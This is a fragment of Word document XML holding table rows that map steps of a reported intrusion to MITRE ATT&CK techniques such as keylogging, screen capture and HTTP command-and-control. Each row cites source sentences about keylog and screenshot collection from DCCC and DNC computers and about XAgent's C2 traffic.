          <w:p w14:paraId="6A5C0BCB" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683D6D58" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1798B9D0" w14:textId="41E959FE" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="591D292B" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EC130D6" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="647B4FE4" w14:textId="7EECE0BF" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69B4C8F9" w14:textId="3C3A0BE6" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00780B73">
              <w:t xml:space="preserve">26 </w:t>
            </w:r>
            <w:r w:rsidR="00762933">
              <w:t xml:space="preserve">collected thousands of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00762933">
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00762933">
              <w:t xml:space="preserve"> and screenshot results from the DCCC and DNC computers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00B857D7" w14:paraId="46244392" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21708DE2" w14:textId="11AAEF64" w:rsidR="00896477" w:rsidRDefault="00040680" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75FFC8C7" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C6648A" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">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060BF1DB" w14:textId="78CAD21E" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="134A0B72" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA5C053" w14:textId="77777777" w:rsidR="00896477" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63CFF48F" w14:textId="67D1130A" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE60BEF" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00105B0A" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r>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communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03649E94" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00105B0A" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00ED5880" w14:paraId="3F981F94" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78410D87" w14:textId="46E1D689" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00040680" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72B0FDE9" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B09B5E1" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E933150" w14:textId="4BF63789" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD782DC" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C3FF9F" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F325E75" w14:textId="38D5389E" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A37F3FE" w14:textId="5CE8A926" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[1</w:t>
            </w:r>
            <w:r w:rsidR="00780B73">
              <w:t>] 26</w:t>
            </w:r>
            <w:r w:rsidR="00762933">
              <w:t xml:space="preserve"> collected thousands of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00762933">
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00762933">
              <w:t xml:space="preserve"> and screenshot results from the DCCC and DNC computers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00ED5880" w14:paraId="4AB06F4D" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A005578" w14:textId="76867A84" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00040680">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DBBB3B" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">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9</w:t>
            </w:r>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D0002F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>ollection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DAA89B8" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22723608" w14:textId="17E78C6A" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00237A9D" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128F90C0" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B0BFF0" w14:textId="77777777" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC017C8" w14:textId="66E9C6E2" w:rsidR="00896477" w:rsidRPr="00ED5880" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA17FE7" w14:textId="3701CFB5" w:rsidR="00896477" w:rsidRDefault="00896477" w:rsidP="007D132F">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00780B73">
              <w:t xml:space="preserve">26 </w:t>
            </w:r>
            <w:r w:rsidR="00762933">
              <w:t xml:space="preserve">collected thousands of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00762933">
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00762933">
              <w:t xml:space="preserve"> and screenshot results from the DCCC and DNC computers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F69B4A" w14:textId="7DA88D68" w:rsidR="004702F2" w:rsidRPr="00B33B9D" w:rsidRDefault="004702F2" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>such as a screenshot and keystroke capture of Employee 2 viewing the online banking information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00762933" w:rsidRPr="00B857D7" w14:paraId="3276B385" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B321FF5" w14:textId="54BFE528" w:rsidR="00762933" w:rsidRDefault="00762933" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D00A982" w14:textId="77777777" w:rsidR="00762933" w:rsidRPr="00B857D7" w:rsidRDefault="00762933" w:rsidP="007D132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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D73C036" w14:textId="77777777" w:rsidR="00762933" w:rsidRPr="00B857D7" w:rsidRDefault="00762933" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008001A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008001A4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CA1A551" w14:textId="203C83C1" w:rsidR="00762933" w:rsidRPr="00B857D7" w:rsidRDefault="00A44F84" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="104FFC21" w14:textId="77777777" w:rsidR="00762933" w:rsidRPr="00B857D7" w:rsidRDefault="00762933" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67884073" w14:textId="77777777" w:rsidR="00762933" w:rsidRDefault="00762933" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711D5A09" w14:textId="13647302" w:rsidR="00762933" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E13F872" w14:textId="77777777" w:rsidR="00762933" w:rsidRPr="00105B0A" w:rsidRDefault="00762933" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>XAgent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> uses HTTP requests to communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
